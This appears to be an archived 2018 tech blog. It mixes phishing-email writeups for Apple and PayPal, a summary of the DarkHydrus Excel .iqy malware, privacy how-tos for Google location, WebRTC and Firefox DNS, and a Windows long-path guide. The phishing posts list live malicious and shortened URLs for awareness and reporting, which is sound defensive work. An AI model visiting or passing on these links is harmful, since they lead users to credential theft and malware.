Thursday, August 30, 2018

Apple Phishing Email - Re : [Order Receipt] Thanks for your Order Number: Sxxxxxxxxx, Your order will be processed. we will send a confirmation email after your order has been shipped.

For the record, this is an Apple phishing email attempt that is recently going around and made it through span filters. What to do?  Report them, goto bottom of page.



FromAppIe Store

Subject
Re : [Order Receipt] Thanks for your Order Number: Sxxxxxxxxx, Your order will be processed. we will send a confirmation email after your order has been shipped.




It contains infected PDF files: Order_S794652016.pdf

Uploading to http://jsunpack.jeek.org/ to detect the PDF javascript malware we find:

PHISHING LINK

https://mails-delveryerrorpaybills66414.masihdomainjdskk.com/Do&post=494528155_17&cc_key=461


How to tell this is a Phishing email ?

  1. Check email address in full, if it's not from originating company then it's phishing.
  2. Hover over all links in email, if it's not from the apple.com site then forget it.

  3. The best way is to look at message source, see below.

How to examine Email Message Source ?

Now lets look at message source
  1. Outlook.com->Actions->View Message Source. 
  2. Gmail.com->More (down arrow to top right)->Show original.
Check for suspicious links, anything that does not originate from apple.com.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (downarrow to top right)->Report Phishing 

Report Phishing URLs at Google now 

If you have recievied this email take further action now by click these links

  1. https://www.google.com/safebrowsing/report_phish/


Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Report phishing emails to Apple 

Forward the email to abuse@icloud.com. This provides Apple's legal department and law enforcement with useful information to help prevent future phishing emails.

Wednesday, August 29, 2018

PayPal Phishing Email - [ New Report Reminder ] Statement update login issue Wednesday, 29 August, 2018

For the record, this PayPal phishing email attempt that is recently going around and made it through span filters. What to do?  Report them, goto bottom of page for instructions.


From : PayPal Support <noreply....@lompatguagebutaslimengkelanjing.com>

Subject
[ New Report Reminder ] Statement update login issue Wednesday, 29 August, 2018

Attachment: #Summary.doc

WORD DOCUMENT

Your account access is limited

Dear Customer

We noticed some unsual activity on your PayPal account and are concerned about potential unauthorized account access.

What's going on?
We want to help ensure PayPal is a secure place to do business. We noticed some changes in your account that require further verification. During this time, you may not have access to certain account activities. Please review the Account impact section for more information about what you can and cannot do.

Impact on account: Medium

Account impact

 Receive money or payments
 Pay using PayPal
 Refund money to customers
 Send money or payments
 Withdraw money from PayPal

What to do next

Please log in to your PayPal account and complete the steps to confirm your identity and recent account activity. To help protect your account, access will remain limited until you complete the necessary steps.

SPAM LINK --> Login To PayPal

Thank you for your understanding and cooperation.

Sincerely

PayPal

Malicious Link

Login To PayPal
Points to http://go2l.ink/1tFW
http://urlexpander.net/ expands to https://paypal-restore.ca


Interestingly the stacked final URL is valid

Very convincing phishing site

















How to tell this is a Phishing email ?


  1. Check email address in full, if it's not from originating company then it's phishing.
  2. Hover over all links in email,check if it from source website address.
  3. The best way is to look at message source, see below.

How to examine Email Message Source ?

Now lets look at message source
  1. Outlook.com->Actions->View Message Source. 
  2. Gmail.com->More (down arrow to top right)->Show original.
Check for suspicious links, anything that does not originate from apple.com.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (downarrow to top right)->Report Phishing 

Report Phishing URLs at Google now 

If you have recievied this email take further action now by click these links

  1. https://www.google.com/safebrowsing/report_phish/


Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Report phishing emails to Apple 

Forward the email to abuse@icloud.com. This provides Apple's legal department and law enforcement with useful information to help prevent future phishing emails.


Report phishing emails to PayPal

“Phishing” is an illegal attempt to "fish" for your private, sensitive data. One of the most common phishing scams involves sending an email that fraudulently claims to be from a well-known company (like PayPal). If you believe you've received a phishing email, follow these steps right away:
  1. Forward the entire email to spoof@paypal.com.
  2. Do not alter the subject line or forward the message as an attachment.
  3. Delete the suspicious email from your inbox.

Monday, August 20, 2018

How to Fully Turn off collection of Location data in Google

Turning off Location History on an Android smartphone doesn't prevent Google from knowing where you've been. Such data is collected in several other ways – for example, when someone uses Google Maps.

How to Turn Location History on or off

On your computer, visit the
 Google Location History page. Turn off (paused).


























To fully turn off the collection of location data, you need to log into your Google account and then navigate to "Web & App Activity" under Activity controls. There you have the option to turn off data collection. This can be done via the Google app on an Android smartphone or by using the browser on a computer.

According to Google, when Web & App Activity is turned on, a user's searches and activity from other Google services are saved to their account in the interests of "better search results and suggestions".

Users can see and delete their searches and browsing activity by visiting "My Activity" while logged into their Google account.





















How to Turn Web & App Activity on or off

  1. On your computer, visit the Activity controls page. You may be asked to sign in to your Google Account.
  2. Turn Web & App Activity on or off.
  3. If you turn the switch on, you can check the box next to "Include Chrome browsing history and activity from websites and apps that use Google services."

Monday, August 13, 2018

WebRTC allows a website directly detects your host machine’s true IP address, circumventing VPNs

Unfortunately for VPN users, WebRTC allows a website (or other WebRTC services) to directly detect your host machines true IP address, regardless of whether you are using a proxy server or VPN.

Interestingly, only Internet Explorer browser did not leak this info natively. Edge, Chrome, Firefox and Opera did. 


Testing for WebRTC IP Leakage

Visit Roseler's https://diafygi.github.io/webrtc-ips/ to see if an local IP appears.


















https://ipleak.net/ is tool that detects whether your browser is vulnerable to a WebRTC leak.








How to Prevent WebRTC IP Leakage

Get uBlock Origin but you must configure to add the following; 


































Or you can install Google's official Chrome extension WebRTC Network Limiter, but must be configured to use last option "Use my proxy server". 

uBlock Origin available for all browsers including Edge browser; 





Saturday, August 11, 2018

PayPal Phishing Email - [Transaction Confirmation] - You've made a purchase from JohnLewis, Ltd. on 11/08/2018

For the record, this PayPal phishing email attempt that is recently going around and made it through span filters. What to do?  Report them, goto bottom of page for instructions.



FromPayPaI Confirmation

Subject
[Transaction Confirmation] You've made a purchase from JohnLewis, Ltd. on 11/08/2018

Keywords: Oakley OO9262 Men's Sliver Polarised Sunglasses, Blue




Account Management button goes to

https://t.co/XVzOpRcdGI?Allahuakbar expanded to https://komporgas.net/AllahItuAdil


http://urlexpander.net/ alerts that this link [Alert] - High risk that the target link / website is harmful and dangerous !

How to tell this is a Phishing email ?


  1. Check email address in full, if it's not from originating company then it's phishing.
  2. Hover over all links in email, if it's not from the apple.com site then forget it.

  3. The best way is to look at message source, see below.

How to examine Email Message Source ?

Now lets look at message source
  1. Outlook.com->Actions->View Message Source. 
  2. Gmail.com->More (down arrow to top right)->Show original.
Check for suspicious links, anything that does not originate from apple.com.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (downarrow to top right)->Report Phishing 

Report Phishing URLs at Google now 

If you have recievied this email take further action now by click these links

  1. https://www.google.com/safebrowsing/report_phish/


Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Report phishing emails to Apple 

Forward the email to abuse@icloud.com. This provides Apple's legal department and law enforcement with useful information to help prevent future phishing emails.


Report phishing emails to PayPal

“Phishing” is an illegal attempt to "fish" for your private, sensitive data. One of the most common phishing scams involves sending an email that fraudulently claims to be from a well-known company (like PayPal). If you believe you've received a phishing email, follow these steps right away:
  1. Forward the entire email to spoof@paypal.com.
  2. Do not alter the subject line or forward the message as an attachment.
  3. Delete the suspicious email from your inbox.

Friday, August 10, 2018

New Threat Actor Group DarkHydrus latest malware uses Excel macro to launch Powershell

Palo Alto Networks Unit 42 detecked a malware dubbed DarkHydrus which contained an attachments that contained malicious Excel Web Query files (.iqy).  .IQY files are simple text files containing a URL which are opened by default by Excel. 

Microsoft Excel natively opens .iqy files and will use the URL in the file to obtain remote data to include in the spreadsheets. By default, Excel does not allow the download of data from the remote server, but will ask for the user’s consent by presenting the dialog box in Figure 1:


Figure 1 Excel security notice for .iqy files



















By enabling this data connection, the user allows Excel to obtain content from the URL in the .iqy file. The contents within the releasenotes.txt file (SHA256:bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d)  contains the following formula that Excel will save to the A0 cell in the worksheet:


Source: https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

Thursday, August 9, 2018

How to Make Windows 10 Accept File Paths Over 260 Characters

Microsoft has a core set of application programming interfaces (APIs) that programmers can use to interact with applications in the Windows operating system. These programming interfaces are often referred to as the Windows API. The Windows API hard-coded a maximum filename length called MAX_PATH such that a filename, including the file path to get to the file, can't exceed 260 characters. 

A path must meet this criterion;  

a+b.txt<=260 characters  
1.The fully qualified filename with extension (b) must be less than 260 characters. ie filename.txt
2.The directory name (a) must be less than 248 characters. ie c:\dir1\dir2
3. Combined a+b must be less than 260 characters.  
Windows Explorer is build using the Windows API, and will fail when copying long paths.

Windows Explorer, now renamed File Explorer in Windows 10+ will fail when copying long paths.



New: Windows 10 and 10 CU tried to address this, with a registry setting to support  "Long Paths" but, File Explorer still fails.




Windows 10 Registry setting 

1
2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\FileSystem]
"LongPathsEnabled"=dword:00000001


However, because this is a limitation of the Windows API and not the file system used on the majority of Windows installations (NTFS), some programs can create filenames that violate this limit.




Online Backups will fail





Back-ups to the cloud providers such as Onedrive, Gdrive and DropBox will fail with path too long errors as well. You may not even see the errors if you don't check the logs, which most users do not.



How to automatically fix Paths Too Long ?


Path Too Long Auto Fixer is the 1st tool of it's kind to automatically fix paths that are too long.


Path Tool Long Auto Fixer tool will find all directories and filenames that are too long and auto correct them! Make sure your next back-up does not fail.

Download free demo at https://pathtoolongautofixer.blogspot.com

Preview

How are Paths Too Long created?


Programs such as MS-DOS, torrents, unzip programs can overcome this.
mkdir "\\?\C:\very long path" in the command shell, for example.

The NTFS file system actually supports file paths of up to 32,767 characters. And you can still use 32,767 character long path names by accessing the Unicode (or "wide") versions of the Windows API functions, and also by prefixing the path with \\?\, as example above.

Most commonly is if you copy files or back-up a hard-drive or USB from another system.




If you share/mount a NTFS disk from a Mac or Linux system can run into paths that are too long, since those systems do support paths that are too long.



Maximum Path Length Limitation -  Technical Details


In the Windows API (with some exceptions discussed in the following paragraphs), the maximum length for a path is MAX_PATH, which is defined as 260 characters. A local path is structured in the following order: drive letter, colon, backslash, name components separated by backslashes, and a terminating null character. For example, the maximum path on drive D is "D:\some 256-character path string" where "" represents the invisible terminating null character for the current system codepage. (The characters < > are used here for visual clarity and cannot be part of a valid path string.)
Note  File I/O functions in the Windows API convert "/" to "\" as part of converting the name to an NT-style name, except when using the "\\?\" prefix as detailed in the following sections.
The Windows API has many functions that also have Unicode versions to permit an extended-length path for a maximum total path length of 32,767 characters. This type of path is composed of components separated by backslashes, each up to the value returned in the lpMaximumComponentLength parameter of the GetVolumeInformation function (this value is commonly 255 characters). To specify an extended-length path, use the "\\?\" prefix. For example, "\\?\D:\very long path".

Note  The maximum path of 32,767 characters is approximate, because the "\\?\" prefix may be expanded to a longer string by the system at run time, and this expansion applies to the total length.

The "\\?\" prefix can also be used with paths constructed according to the universal naming convention (UNC). To specify such a path using UNC, use the "\\?\UNC\" prefix. For example, "\\?\UNC\server\share", where "server" is the name of the computer and "share" is the name of the shared folder. These prefixes are not used as part of the path itself. They indicate that the path should be passed to the system with minimal modification, which means that you cannot use forward slashes to represent path separators, or a period to represent the current directory, or double dots to represent the parent directory. Because you cannot use the "\\?\" prefix with a relative path, relative paths are always limited to a total of MAX_PATHcharacters.


Wednesday, August 8, 2018

Cloudflare DNS resolver for Mozilla is a privacy violation and will kill it's popularity

Mozilla recently announced that it would begin using Cloudflare’s resolver service to look up all queries from the Mozilla browser, even overriding the otherwise default resolver set for the user. 

https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html

Cloudflare, runs one of the worlds largest networks that powers more than 10 trillion requests per month, which the company says is nearly 10 percent of all Internet requests spanning more than 2.5 billion people worldwide. But big is not always better, as it has been the target of numerous hacks. So what is Mozilla thinking? 

Moreover, your applications shouldn’t be deciding your DNS settings.  No app should be overriding your local DNS settings. Anybody with visibility into your resolver queries knows a lot about your online habits, including what websites you are visiting. T

This is a very serious privacy issue and will lead to many dropping Mozilla as a browser. 

Great articles; 

  • https://blog.ungleich.ch/en-us/cms/blog/2018/08/04/mozillas-new-dns-resolution-is-dangerous/
  • https://gioxx.org/2018/08/01/firefox-dns-over-https/
  • https://blog.nightly.mozilla.org/2018/06/01/improving-dns-privacy-in-firefox/ 


Disabling it this preemptively; 

  • Enter about:config in the Mozilla address bar
  • Search for network.trr
  • Set network.trr.mode = 5 to completely disable it

Feature discussion; 

  at Bugzilla  about the new TRR ( Trusted Recursive Resolver ) says: 

Basic description of experiment: TRR is a separate and parallel way to resolve host names in the browser and the implementation allows for several different operational modes. We want to enable TRR in “shadow mode”, meaning that Firefox resolves all host names using both original native resolver mechanism as well as DNS-over-HTTPS (DOH) but the results from DOH are discarded and are only used for measuring and telemetry. For this experiment, we would use a cloudflare hosted server.

What is the preference we will be changing? network.trr.mode = 4, and network.trr.uri = “https://dns.cloudflare.com/.well-known/dns”

What are the branches of the study and what values should each branch be set to? Two branches: one using TRR, one not. (the one ‘not’ might actually be the control - it would have default prefs. Not sure of shield nomenclature.)

What percentage of users do you want in each branch? 50/50

What Channels and locales do you intend to ship to? Nightly

What is your intended go live date and how long will the study run? 7 days (?)
Are there specific criteria for participants? We want a random distribution to make it possible to assume both branches are sufficiently similar, user wise. Being able to break the data down by very rough locale would be interesting as internet topology will impact performance.

What is the main effect you are looking for and what data will you use to make these decisions? We will look at resolver timings, connection error rates and http response code changes.

Who is the owner of the data analysis for this study? Daniel Stenberg + Patrick McManus

Will this experiment require uplift? No

QA Status of your code: Green, yellow, red. Your code should be QA’d to ensure that changing the preference values has the intended effect you are looking for and does not cause obvious regressions to Firefox. All experiments must pass QA. Depending on the channel/population size a dev QA may be accepted.

Do you plan on surveying users at the end of the study? No.

Link to any relevant google docs / Drive files that describe the project. Links to prior art if it exists:



Details Section for Analysis
For each telemetry probe to be analysed in the study, find it here to determine the following:
Name of probes
DNS_LOOKUP_DISPOSITION
DNS_NATIVE_LOOKUP_TIME
DNS_TRR_RACE
DNS_LOOKUP_ALGORITHM
DNS_TRR_LOOKUP_TIME
DNS_BLACKLIST_COUNT
DNS_TRR_BLACKLISTED
DNS_CLEANUP_AGE
IPV4_AND_IPV6_ADDRESS_CONNECTIVITY
HTTP_RESPONSE_STATUS_CODE
Associated bugzilla thread URL:
e.g. https://bugzilla.mozilla.org/show_bug.cgi?id=

 (a contributor) rational response; 

I think we shouldn't run this study in the proposed form. Sending information about what is browsed to an off-path party will erode trust in Mozilla due to people getting upset about privacy-sensitive information (what they browse where "they" is identified by IP address and "what" by host name) getting sent to an off-path party without explicit consent. The policy agreements we have in place with the off-path party won't remove this negative effect, since the way people are known to react this kind of thing isn't in our power to negotiate: people will react to this as a matter of what technically got sent and not as a matter of what the recipient promised not to do. (A browser sending information about what is browsed to an off-path party is the quintessential browser privacy no-no.) (By off-path party, I mean a party that isn't *by necessity* on the network path between the user's computer and the site the user browses. The site can use third-party trackers or infrastructure providers, but that's an action on the site's part--not on the browser's part.) The problem could be addressed in two ways: 1) To study things like end-to-end reachability or round-trip time, Firefox could perform queries for a set of pre-defined names (to remove any correlation with what the user actually browses). This kind of thing has successful precedent as part of TLS 1.3 handshake studies. 2) To study things under realistic use, we should obtain an explicit opt in specifically for sending DNS queries to Cloudflare. (We should do this even if it introduces a potential bias in the data.)